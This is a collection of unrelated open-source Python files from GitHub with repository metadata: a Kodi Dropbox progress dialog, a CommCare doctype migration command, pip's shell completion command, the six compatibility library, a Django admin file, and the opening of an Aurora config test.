PROGRESS_BAR = 32
#ACTION IDs
ACTION_SELECT_ITEM = 7
parentWindow = None
_heading = ''
_visible = False
_closedTime = 0
TIMEOUT = 7 #secs
def __init__(self, *args, **kwargs):
super(DropboxBackgroundProgress, self).__init__(*args, **kwargs)
def setHeading(self, heading):
self._heading = heading
def onInit(self):
#super(DropboxBackgroundProgress, self).onInit()
self.getControl(self.HEADING_LABEL).setLabel(self._heading)
self._visible = True
def update(self, itemsHandled, itemsTotal, text=None):
if itemsTotal > 0:
if not self._visible and (self._closedTime + self.TIMEOUT) < time.time():
self.show()
percent = 1
if itemsHandled > 0:
percent = (itemsHandled *100) / itemsTotal
line1 = "(%s/%s)"%(itemsHandled, itemsTotal)
if text:
line1 += text
#Some skins don't have the following items in the FileBrowser!
try:
self.getControl(self.LINE1_LABEL).setLabel(line1)
except Exception as e:
log_debug("DropboxFileBrowser Exception: %s" %(repr(e)) )
try:
self.getControl(self.PROGRESS_BAR).setPercent(percent)
except Exception as e:
log_debug("DropboxFileBrowser Exception: %s" %(repr(e)) )
def onClick(self, controlId):
self._visible = False
self._closedTime = time.time()
self.close()
def onAction(self, action):
self._visible = False
self._closedTime = time.time()
self.close()
| {
"content_hash": "a916404b9c26395a544b1203261956de",
"timestamp": "",
"source": "github",
"line_count": 69,
"max_line_length": 85,
"avg_line_length": 29.782608695652176,
"alnum_prop": 0.5849148418491484,
"repo_name": "TidalPaladin/Superliminal-resin",
"id": "3447b0d21929a49b66b589e01d3be31be98e1c5d",
"size": "2876",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "app/plugin.dbmc/resources/lib/dropboxprogress.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "11"
},
{
"name": "Python",
"bytes": "874230"
},
{
"name": "Shell",
"bytes": "2757"
}
],
"symlink_target": ""
} |
from optparse import make_option
import re
from django.core.management import BaseCommand, CommandError
from corehq.doctypemigrations.migrator_instances import get_migrator_by_slug, \
get_migrator_slugs
USAGE = """You may run either of the following commands
./manage.py run_doctype_migration <slug> --stats
./manage.py run_doctype_migration <slug> --initial
./manage.py run_doctype_migration <slug> --continuous
./manage.py run_doctype_migration <slug> --cleanup
with with the following slugs:
{}
""".format('\n'.join(get_migrator_slugs()))
MAYBE_YOU_WANT_TO_RUN_CONTINUOUS = """You have already run an initial migration.
Run
./manage.py run_doctype_migration {} --continuous
for continuous replication starting where you left off.
"""
MAYBE_YOU_WANT_TO_RUN_INITIAL = """You have not yet run an initial migration.
Run
./manage.py run_doctype_migration {} --initial
to do a bulk migrate before continuous replication.
"""
CANNOT_RUN_CONTINUOUS_AFTER_CLEANUP = """You have already run cleanup for this migration.
You cannot run --continuous after --cleanup.
This is actually very important: if you were to run --continuous again, that would
replicate changes from the source db to the target db
resulting in the docs deleted in cleanup also being deleted from the target db!
You're welcome.
"""
class Command(BaseCommand):
"""
Example: ./manage.py run_doctype_migration user_db_migration
"""
help = USAGE
option_list = BaseCommand.option_list + (
make_option(
'--initial',
action='store_true',
default=False,
help="Do a full, initial bulk migration.",
),
make_option(
'--continuous',
action='store_true',
default=False,
help=("Start a continuous migration to keep things topped off "
"based on the changes feed. This should be run in a screen "
"session and cancelled with ^C once it's no longer needed."),
),
make_option(
'--cleanup',
action='store_true',
default=False,
help="Delete the old documents still in the source db.",
),
make_option(
'--stats',
action='store_true',
default=False,
help="Output misc info about the status of the migration.",
),
make_option(
'--erase-continuous-progress',
action='store_true',
default=False
)
)
def handle(self, migrator_slug=None, initial=None, continuous=None, cleanup=None,
stats=None, erase_continuous_progress=None, **options):
try:
migrator = get_migrator_by_slug(migrator_slug)
except KeyError:
raise CommandError(USAGE)
if not any((initial, continuous, cleanup, stats, erase_continuous_progress)):
raise CommandError('initial, continuous, cleanup, stats, or '
'erase_continuous_progress must be set')
if cleanup and (initial or continuous):
raise CommandError('cleanup must be run alone')
if stats:
self.handle_stats(migrator)
if initial:
if migrator.last_seq:
raise CommandError(MAYBE_YOU_WANT_TO_RUN_CONTINUOUS.format(migrator_slug))
self.handle_initial(migrator)
if erase_continuous_progress:
if not migrator.original_seq:
CommandError(MAYBE_YOU_WANT_TO_RUN_INITIAL.format(migrator_slug))
if migrator.cleanup_complete:
raise CommandError(CANNOT_RUN_CONTINUOUS_AFTER_CLEANUP)
self.handle_erase_continuous_progress(migrator)
if continuous:
if not migrator.last_seq:
raise CommandError(MAYBE_YOU_WANT_TO_RUN_INITIAL.format(migrator_slug))
if migrator.cleanup_complete:
raise CommandError(CANNOT_RUN_CONTINUOUS_AFTER_CLEANUP)
self.handle_continuous(migrator)
if cleanup:
confirmation = raw_input(
"Cleanup will remove doc_types ({}) from db {}\n"
"I recommend running './manage.py delete_doc_conflicts' "
"first or some docs might not actually be deleted.\n"
"Are you sure you want to proceed? [y/n]"
.format(', '.join(migrator.doc_types), migrator.source_db))
if confirmation == 'y':
if migrator.docs_are_replicating():
self.stdout.write(
"It looks like replication is still happening, please track "
"down and cancel before attempting to cleanup, lest you "
"replicate the deletions. Yikes!")
return
self.handle_cleanup(migrator)
@staticmethod
def handle_initial(migrator):
migrator.phase_1_bulk_migrate()
def handle_continuous(self, migrator):
self.stderr.write("Starting continuous replication...")
migration = migrator.phase_2_continuous_migrate_interactive()
for status_update in migration:
self.stdout.write('Read {} changes, saved seq {}'.format(
status_update.changes_read, status_update.last_seq))
if status_update.caught_up:
self.stdout.write('All caught up!')
def handle_erase_continuous_progress(self, migrator):
migrator.erase_continuous_progress()
def handle_cleanup(self, migrator):
migrator.phase_3_clean_up()
def handle_stats(self, migrator):
[(source_db, source_counts),
(target_db, target_counts)] = migrator.get_doc_counts()
self.stdout.write('Source DB: {}'.format(_scrub_uri(source_db.uri)))
self.stdout.write('Target DB: {}'.format(_scrub_uri(target_db.uri)))
self.stdout.write('')
self.stdout.write('{:^30}\tSource\tTarget'.format('doc_type'))
for doc_type in sorted(migrator.doc_types):
self.stdout.write(
'{:<30}\t{}\t{}'
.format(doc_type, source_counts[doc_type], target_counts[doc_type]))
def _scrub_uri(uri):
return re.sub(r'//(.*):(.*)@', r'//\1:******@', uri)
| {
"content_hash": "8052acff97cac255f8972e2ddc6d94d7",
"timestamp": "",
"source": "github",
"line_count": 166,
"max_line_length": 90,
"avg_line_length": 37.825301204819276,
"alnum_prop": 0.608058608058608,
"repo_name": "qedsoftware/commcare-hq",
"id": "54af3f882c5b05f30249c8d7ef6eb4e0b3bda3fe",
"size": "6279",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "corehq/doctypemigrations/management/commands/run_doctype_migration.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ActionScript",
"bytes": "15950"
},
{
"name": "CSS",
"bytes": "508392"
},
{
"name": "HTML",
"bytes": "2869325"
},
{
"name": "JavaScript",
"bytes": "2395360"
},
{
"name": "PHP",
"bytes": "2232"
},
{
"name": "PLpgSQL",
"bytes": "125298"
},
{
"name": "Python",
"bytes": "14670713"
},
{
"name": "Shell",
"bytes": "37514"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
import sys
import textwrap
from pip._internal.cli.base_command import Command
from pip._internal.utils.misc import get_prog
BASE_COMPLETION = """
# pip {shell} completion start{script}# pip {shell} completion end
"""
COMPLETION_SCRIPTS = {
'bash': """
_pip_completion()
{{
COMPREPLY=( $( COMP_WORDS="${{COMP_WORDS[*]}}" \\
COMP_CWORD=$COMP_CWORD \\
PIP_AUTO_COMPLETE=1 $1 2>/dev/null ) )
}}
complete -o default -F _pip_completion {prog}
""",
'zsh': """
function _pip_completion {{
local words cword
read -Ac words
read -cn cword
reply=( $( COMP_WORDS="$words[*]" \\
COMP_CWORD=$(( cword-1 )) \\
PIP_AUTO_COMPLETE=1 $words[1] 2>/dev/null ))
}}
compctl -K _pip_completion {prog}
""",
'fish': """
function __fish_complete_pip
set -lx COMP_WORDS (commandline -o) ""
set -lx COMP_CWORD ( \\
math (contains -i -- (commandline -t) $COMP_WORDS)-1 \\
)
set -lx PIP_AUTO_COMPLETE 1
string split \\ -- (eval $COMP_WORDS[1])
end
complete -fa "(__fish_complete_pip)" -c {prog}
""",
}
class CompletionCommand(Command):
"""A helper command to be used for command completion."""
ignore_require_venv = True
def __init__(self, *args, **kw):
super(CompletionCommand, self).__init__(*args, **kw)
cmd_opts = self.cmd_opts
cmd_opts.add_option(
'--bash', '-b',
action='store_const',
const='bash',
dest='shell',
help='Emit completion code for bash')
cmd_opts.add_option(
'--zsh', '-z',
action='store_const',
const='zsh',
dest='shell',
help='Emit completion code for zsh')
cmd_opts.add_option(
'--fish', '-f',
action='store_const',
const='fish',
dest='shell',
help='Emit completion code for fish')
self.parser.insert_option_group(0, cmd_opts)
def run(self, options, args):
"""Prints the completion code of the given shell"""
shells = COMPLETION_SCRIPTS.keys()
shell_options = ['--' + shell for shell in sorted(shells)]
if options.shell in shells:
script = textwrap.dedent(
COMPLETION_SCRIPTS.get(options.shell, '').format(
prog=get_prog())
)
print(BASE_COMPLETION.format(script=script, shell=options.shell))
else:
sys.stderr.write(
'ERROR: You must pass {}\n' .format(' or '.join(shell_options))
)
| {
"content_hash": "68abb3c6026f2db94fcc9f35c700284a",
"timestamp": "",
"source": "github",
"line_count": 92,
"max_line_length": 79,
"avg_line_length": 30.967391304347824,
"alnum_prop": 0.5057915057915058,
"repo_name": "davidharvey1986/pyRRG",
"id": "910fcbfe358d6220e71c03cb9e3409590bc11802",
"size": "2957",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "unittests/bugFixPyRRG/lib/python3.7/site-packages/pip/_internal/commands/completion.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "PowerShell",
"bytes": "8321"
},
{
"name": "Python",
"bytes": "5803472"
},
{
"name": "Shell",
"bytes": "3862"
}
],
"symlink_target": ""
} |
"""Utilities for writing code that runs on Python 2 and 3"""
# Copyright (c) 2010-2013 Benjamin Peterson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import operator
import sys
import types
__author__ = "Benjamin Peterson <benjamin@python.org>"
__version__ = "1.4.1"
# Useful for very coarse version differentiation.
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
if PY3:
string_types = str,
integer_types = int,
class_types = type,
text_type = str
binary_type = bytes
MAXSIZE = sys.maxsize
else:
string_types = basestring,
integer_types = (int, long)
class_types = (type, types.ClassType)
text_type = unicode
binary_type = str
if sys.platform.startswith("java"):
# Jython always uses 32 bits.
MAXSIZE = int((1 << 31) - 1)
else:
# It's possible to have sizeof(long) != sizeof(Py_ssize_t).
class X(object):
def __len__(self):
return 1 << 31
try:
len(X())
except OverflowError:
# 32-bit
MAXSIZE = int((1 << 31) - 1)
else:
# 64-bit
MAXSIZE = int((1 << 63) - 1)
del X
def _add_doc(func, doc):
"""Add documentation to a function."""
func.__doc__ = doc
def _import_module(name):
"""Import module, returning the module after the last dot."""
__import__(name)
return sys.modules[name]
class _LazyDescr(object):
def __init__(self, name):
self.name = name
def __get__(self, obj, tp):
result = self._resolve()
setattr(obj, self.name, result)
# This is a bit ugly, but it avoids running this again.
delattr(tp, self.name)
return result
class MovedModule(_LazyDescr):
def __init__(self, name, old, new=None):
super(MovedModule, self).__init__(name)
if PY3:
if new is None:
new = name
self.mod = new
else:
self.mod = old
def _resolve(self):
return _import_module(self.mod)
class MovedAttribute(_LazyDescr):
def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None):
super(MovedAttribute, self).__init__(name)
if PY3:
if new_mod is None:
new_mod = name
self.mod = new_mod
if new_attr is None:
if old_attr is None:
new_attr = name
else:
new_attr = old_attr
self.attr = new_attr
else:
self.mod = old_mod
if old_attr is None:
old_attr = name
self.attr = old_attr
def _resolve(self):
module = _import_module(self.mod)
return getattr(module, self.attr)
class _MovedItems(types.ModuleType):
"""Lazy loading of moved objects"""
_moved_attributes = [
MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"),
MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"),
MovedAttribute("filterfalse", "itertools", "itertools", "ifilterfalse", "filterfalse"),
MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"),
MovedAttribute("map", "itertools", "builtins", "imap", "map"),
MovedAttribute("range", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("reload_module", "__builtin__", "imp", "reload"),
MovedAttribute("reduce", "__builtin__", "functools"),
MovedAttribute("StringIO", "StringIO", "io"),
MovedAttribute("UserString", "UserString", "collections"),
MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("zip", "itertools", "builtins", "izip", "zip"),
MovedAttribute("zip_longest", "itertools", "itertools", "izip_longest", "zip_longest"),
MovedModule("builtins", "__builtin__"),
MovedModule("configparser", "ConfigParser"),
MovedModule("copyreg", "copy_reg"),
MovedModule("dbm_gnu", "gdbm", "dbm.gnu"),
MovedModule("http_cookiejar", "cookielib", "http.cookiejar"),
MovedModule("http_cookies", "Cookie", "http.cookies"),
MovedModule("html_entities", "htmlentitydefs", "html.entities"),
MovedModule("html_parser", "HTMLParser", "html.parser"),
MovedModule("http_client", "httplib", "http.client"),
MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"),
MovedModule("email_mime_text", "email.MIMEText", "email.mime.text"),
MovedModule("email_mime_base", "email.MIMEBase", "email.mime.base"),
MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"),
MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"),
MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"),
MovedModule("cPickle", "cPickle", "pickle"),
MovedModule("queue", "Queue"),
MovedModule("reprlib", "repr"),
MovedModule("socketserver", "SocketServer"),
MovedModule("_thread", "thread", "_thread"),
MovedModule("tkinter", "Tkinter"),
MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"),
MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"),
MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"),
MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"),
MovedModule("tkinter_tix", "Tix", "tkinter.tix"),
MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"),
MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"),
MovedModule("tkinter_colorchooser", "tkColorChooser",
"tkinter.colorchooser"),
MovedModule("tkinter_commondialog", "tkCommonDialog",
"tkinter.commondialog"),
MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"),
MovedModule("tkinter_font", "tkFont", "tkinter.font"),
MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"),
MovedModule("tkinter_tksimpledialog", "tkSimpleDialog",
"tkinter.simpledialog"),
MovedModule("urllib_parse", __name__ + ".moves.urllib_parse", "urllib.parse"),
MovedModule("urllib_error", __name__ + ".moves.urllib_error", "urllib.error"),
MovedModule("urllib", __name__ + ".moves.urllib", __name__ + ".moves.urllib"),
MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"),
MovedModule("xmlrpc_client", "xmlrpclib", "xmlrpc.client"),
MovedModule("winreg", "_winreg"),
]
for attr in _moved_attributes:
setattr(_MovedItems, attr.name, attr)
del attr
moves = sys.modules[__name__ + ".moves"] = _MovedItems(__name__ + ".moves")
class Module_six_moves_urllib_parse(types.ModuleType):
"""Lazy loading of moved objects in six.moves.urllib_parse"""
_urllib_parse_moved_attributes = [
MovedAttribute("ParseResult", "urlparse", "urllib.parse"),
MovedAttribute("parse_qs", "urlparse", "urllib.parse"),
MovedAttribute("parse_qsl", "urlparse", "urllib.parse"),
MovedAttribute("urldefrag", "urlparse", "urllib.parse"),
MovedAttribute("urljoin", "urlparse", "urllib.parse"),
MovedAttribute("urlparse", "urlparse", "urllib.parse"),
MovedAttribute("urlsplit", "urlparse", "urllib.parse"),
MovedAttribute("urlunparse", "urlparse", "urllib.parse"),
MovedAttribute("urlunsplit", "urlparse", "urllib.parse"),
MovedAttribute("quote", "urllib", "urllib.parse"),
MovedAttribute("quote_plus", "urllib", "urllib.parse"),
MovedAttribute("unquote", "urllib", "urllib.parse"),
MovedAttribute("unquote_plus", "urllib", "urllib.parse"),
MovedAttribute("urlencode", "urllib", "urllib.parse"),
]
for attr in _urllib_parse_moved_attributes:
setattr(Module_six_moves_urllib_parse, attr.name, attr)
del attr
sys.modules[__name__ + ".moves.urllib_parse"] = Module_six_moves_urllib_parse(__name__ + ".moves.urllib_parse")
sys.modules[__name__ + ".moves.urllib.parse"] = Module_six_moves_urllib_parse(__name__ + ".moves.urllib.parse")
class Module_six_moves_urllib_error(types.ModuleType):
"""Lazy loading of moved objects in six.moves.urllib_error"""
_urllib_error_moved_attributes = [
MovedAttribute("URLError", "urllib2", "urllib.error"),
MovedAttribute("HTTPError", "urllib2", "urllib.error"),
MovedAttribute("ContentTooShortError", "urllib", "urllib.error"),
]
for attr in _urllib_error_moved_attributes:
setattr(Module_six_moves_urllib_error, attr.name, attr)
del attr
sys.modules[__name__ + ".moves.urllib_error"] = Module_six_moves_urllib_error(__name__ + ".moves.urllib_error")
sys.modules[__name__ + ".moves.urllib.error"] = Module_six_moves_urllib_error(__name__ + ".moves.urllib.error")
class Module_six_moves_urllib_request(types.ModuleType):
"""Lazy loading of moved objects in six.moves.urllib_request"""
_urllib_request_moved_attributes = [
MovedAttribute("urlopen", "urllib2", "urllib.request"),
MovedAttribute("install_opener", "urllib2", "urllib.request"),
MovedAttribute("build_opener", "urllib2", "urllib.request"),
MovedAttribute("pathname2url", "urllib", "urllib.request"),
MovedAttribute("url2pathname", "urllib", "urllib.request"),
MovedAttribute("getproxies", "urllib", "urllib.request"),
MovedAttribute("Request", "urllib2", "urllib.request"),
MovedAttribute("OpenerDirector", "urllib2", "urllib.request"),
MovedAttribute("HTTPDefaultErrorHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPRedirectHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPCookieProcessor", "urllib2", "urllib.request"),
MovedAttribute("ProxyHandler", "urllib2", "urllib.request"),
MovedAttribute("BaseHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPPasswordMgr", "urllib2", "urllib.request"),
MovedAttribute("HTTPPasswordMgrWithDefaultRealm", "urllib2", "urllib.request"),
MovedAttribute("AbstractBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("ProxyBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("AbstractDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("ProxyDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPSHandler", "urllib2", "urllib.request"),
MovedAttribute("FileHandler", "urllib2", "urllib.request"),
MovedAttribute("FTPHandler", "urllib2", "urllib.request"),
MovedAttribute("CacheFTPHandler", "urllib2", "urllib.request"),
MovedAttribute("UnknownHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPErrorProcessor", "urllib2", "urllib.request"),
MovedAttribute("urlretrieve", "urllib", "urllib.request"),
MovedAttribute("urlcleanup", "urllib", "urllib.request"),
MovedAttribute("URLopener", "urllib", "urllib.request"),
MovedAttribute("FancyURLopener", "urllib", "urllib.request"),
]
for attr in _urllib_request_moved_attributes:
setattr(Module_six_moves_urllib_request, attr.name, attr)
del attr
sys.modules[__name__ + ".moves.urllib_request"] = Module_six_moves_urllib_request(__name__ + ".moves.urllib_request")
sys.modules[__name__ + ".moves.urllib.request"] = Module_six_moves_urllib_request(__name__ + ".moves.urllib.request")
class Module_six_moves_urllib_response(types.ModuleType):
"""Lazy loading of moved objects in six.moves.urllib_response"""
_urllib_response_moved_attributes = [
MovedAttribute("addbase", "urllib", "urllib.response"),
MovedAttribute("addclosehook", "urllib", "urllib.response"),
MovedAttribute("addinfo", "urllib", "urllib.response"),
MovedAttribute("addinfourl", "urllib", "urllib.response"),
]
for attr in _urllib_response_moved_attributes:
setattr(Module_six_moves_urllib_response, attr.name, attr)
del attr
sys.modules[__name__ + ".moves.urllib_response"] = Module_six_moves_urllib_response(__name__ + ".moves.urllib_response")
sys.modules[__name__ + ".moves.urllib.response"] = Module_six_moves_urllib_response(__name__ + ".moves.urllib.response")
class Module_six_moves_urllib_robotparser(types.ModuleType):
"""Lazy loading of moved objects in six.moves.urllib_robotparser"""
_urllib_robotparser_moved_attributes = [
MovedAttribute("RobotFileParser", "robotparser", "urllib.robotparser"),
]
for attr in _urllib_robotparser_moved_attributes:
setattr(Module_six_moves_urllib_robotparser, attr.name, attr)
del attr
sys.modules[__name__ + ".moves.urllib_robotparser"] = Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib_robotparser")
sys.modules[__name__ + ".moves.urllib.robotparser"] = Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib.robotparser")
class Module_six_moves_urllib(types.ModuleType):
"""Create a six.moves.urllib namespace that resembles the Python 3 namespace"""
parse = sys.modules[__name__ + ".moves.urllib_parse"]
error = sys.modules[__name__ + ".moves.urllib_error"]
request = sys.modules[__name__ + ".moves.urllib_request"]
response = sys.modules[__name__ + ".moves.urllib_response"]
robotparser = sys.modules[__name__ + ".moves.urllib_robotparser"]
sys.modules[__name__ + ".moves.urllib"] = Module_six_moves_urllib(__name__ + ".moves.urllib")
def add_move(move):
"""Add an item to six.moves."""
setattr(_MovedItems, move.name, move)
def remove_move(name):
"""Remove item from six.moves."""
try:
delattr(_MovedItems, name)
except AttributeError:
try:
del moves.__dict__[name]
except KeyError:
raise AttributeError("no such move, %r" % (name,))
if PY3:
_meth_func = "__func__"
_meth_self = "__self__"
_func_closure = "__closure__"
_func_code = "__code__"
_func_defaults = "__defaults__"
_func_globals = "__globals__"
_iterkeys = "keys"
_itervalues = "values"
_iteritems = "items"
_iterlists = "lists"
else:
_meth_func = "im_func"
_meth_self = "im_self"
_func_closure = "func_closure"
_func_code = "func_code"
_func_defaults = "func_defaults"
_func_globals = "func_globals"
_iterkeys = "iterkeys"
_itervalues = "itervalues"
_iteritems = "iteritems"
_iterlists = "iterlists"
try:
advance_iterator = next
except NameError:
def advance_iterator(it):
return it.next()
next = advance_iterator
try:
callable = callable
except NameError:
def callable(obj):
return any("__call__" in klass.__dict__ for klass in type(obj).__mro__)
if PY3:
def get_unbound_function(unbound):
return unbound
create_bound_method = types.MethodType
Iterator = object
else:
def get_unbound_function(unbound):
return unbound.im_func
def create_bound_method(func, obj):
return types.MethodType(func, obj, obj.__class__)
class Iterator(object):
def next(self):
return type(self).__next__(self)
callable = callable
_add_doc(get_unbound_function,
"""Get the function out of a possibly unbound function""")
get_method_function = operator.attrgetter(_meth_func)
get_method_self = operator.attrgetter(_meth_self)
get_function_closure = operator.attrgetter(_func_closure)
get_function_code = operator.attrgetter(_func_code)
get_function_defaults = operator.attrgetter(_func_defaults)
get_function_globals = operator.attrgetter(_func_globals)
def iterkeys(d, **kw):
"""Return an iterator over the keys of a dictionary."""
return iter(getattr(d, _iterkeys)(**kw))
def itervalues(d, **kw):
"""Return an iterator over the values of a dictionary."""
return iter(getattr(d, _itervalues)(**kw))
def iteritems(d, **kw):
"""Return an iterator over the (key, value) pairs of a dictionary."""
return iter(getattr(d, _iteritems)(**kw))
def iterlists(d, **kw):
"""Return an iterator over the (key, [values]) pairs of a dictionary."""
return iter(getattr(d, _iterlists)(**kw))
if PY3:
def b(s):
return s.encode("latin-1")
def u(s):
return s
unichr = chr
if sys.version_info[1] <= 1:
def int2byte(i):
return bytes((i,))
else:
# This is about 2x faster than the implementation above on 3.2+
int2byte = operator.methodcaller("to_bytes", 1, "big")
byte2int = operator.itemgetter(0)
indexbytes = operator.getitem
iterbytes = iter
import io
StringIO = io.StringIO
BytesIO = io.BytesIO
else:
def b(s):
return s
def u(s):
return unicode(s, "unicode_escape")
unichr = unichr
int2byte = chr
def byte2int(bs):
return ord(bs[0])
def indexbytes(buf, i):
return ord(buf[i])
def iterbytes(buf):
return (ord(byte) for byte in buf)
import StringIO
StringIO = BytesIO = StringIO.StringIO
_add_doc(b, """Byte literal""")
_add_doc(u, """Text literal""")
if PY3:
exec_ = getattr(moves.builtins, "exec")
def reraise(tp, value, tb=None):
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
else:
def exec_(_code_, _globs_=None, _locs_=None):
"""Execute code in a namespace."""
if _globs_ is None:
frame = sys._getframe(1)
_globs_ = frame.f_globals
if _locs_ is None:
_locs_ = frame.f_locals
del frame
elif _locs_ is None:
_locs_ = _globs_
exec("""exec _code_ in _globs_, _locs_""")
exec_("""def reraise(tp, value, tb=None):
raise tp, value, tb
""")
print_ = getattr(moves.builtins, "print", None)
if print_ is None:
def print_(*args, **kwargs):
"""The new-style print function for Python 2.4 and 2.5."""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
# If the file has an encoding, encode unicode with it.
if (isinstance(fp, file) and
isinstance(data, unicode) and
fp.encoding is not None):
errors = getattr(fp, "errors", None)
if errors is None:
errors = "strict"
data = data.encode(fp.encoding, errors)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
_add_doc(reraise, """Reraise an exception.""")
def with_metaclass(meta, *bases):
"""Create a base class with a metaclass."""
return meta("NewBase", bases, {})
def add_metaclass(metaclass):
"""Class decorator for creating a class with a metaclass."""
def wrapper(cls):
orig_vars = cls.__dict__.copy()
orig_vars.pop('__dict__', None)
orig_vars.pop('__weakref__', None)
for slots_var in orig_vars.get('__slots__', ()):
orig_vars.pop(slots_var)
return metaclass(cls.__name__, cls.__bases__, orig_vars)
return wrapper
| {
"content_hash": "5b269ad1ae2f677f6e906b0d379347e0",
"timestamp": "",
"source": "github",
"line_count": 585,
"max_line_length": 129,
"avg_line_length": 36.141880341880345,
"alnum_prop": 0.6356713805987797,
"repo_name": "pombreda/swarming",
"id": "176196c05b963beaff4f9be3659f05a5124f0547",
"size": "21143",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "appengine/components/third_party/six/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "3014"
},
{
"name": "HTML",
"bytes": "249103"
},
{
"name": "JavaScript",
"bytes": "925519"
},
{
"name": "Protocol Buffer",
"bytes": "8868"
},
{
"name": "Python",
"bytes": "1495594"
},
{
"name": "Shell",
"bytes": "1267"
}
],
"symlink_target": ""
} |
from django.contrib import admin
from accounts.models import UserGroup, UserProfile
# Register your models here.
class UserAdmin(admin.ModelAdmin):
pass
class GroupAdmin(admin.ModelAdmin):
pass
admin.site.register(UserProfile, UserAdmin)
admin.site.register(UserGroup, GroupAdmin) | {
"content_hash": "a6e7aaefdda07004eec51daccb6cc13e",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 50,
"avg_line_length": 21.857142857142858,
"alnum_prop": 0.7647058823529411,
"repo_name": "vivianbuan/cs3240-s15-team20",
"id": "a9a47077a5d35080b5da6c8d7eb195ec7fdd328d",
"size": "306",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "SecureWitness/accounts/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Arduino",
"bytes": "5218"
},
{
"name": "CSS",
"bytes": "649"
},
{
"name": "HTML",
"bytes": "46566"
},
{
"name": "Python",
"bytes": "80790"
}
],
"symlink_target": ""
} |
import os
from io import BytesIO
import pytest
from twitter.common.contextutil import temporary_dir
from apache.aurora.client import config
from apache.aurora.client.config import get_config as get_aurora_config
from apache.aurora.config import AuroraConfig
from apache.aurora.config.loader import AuroraConfigLoader
from apache.aurora.config.schema.base import (
MB,
Announcer,
HealthCheckConfig,
Job,
Resources,
Task,
UpdateConfig
)
MESOS_CONFIG_BASE = """
HELLO_WORLD = Job(
name = 'hello_world',
role = 'john_doe',
cluster = 'test-cluster',
environment = 'test',
%(announce)s
task = Task(
name = 'main',
processes = [Process(name = 'hello_world', cmdline = '%(cmdline)s')],
resources = Resources(cpu = 0.1, ram = 64 * MB, disk = 64 * MB),
)
)
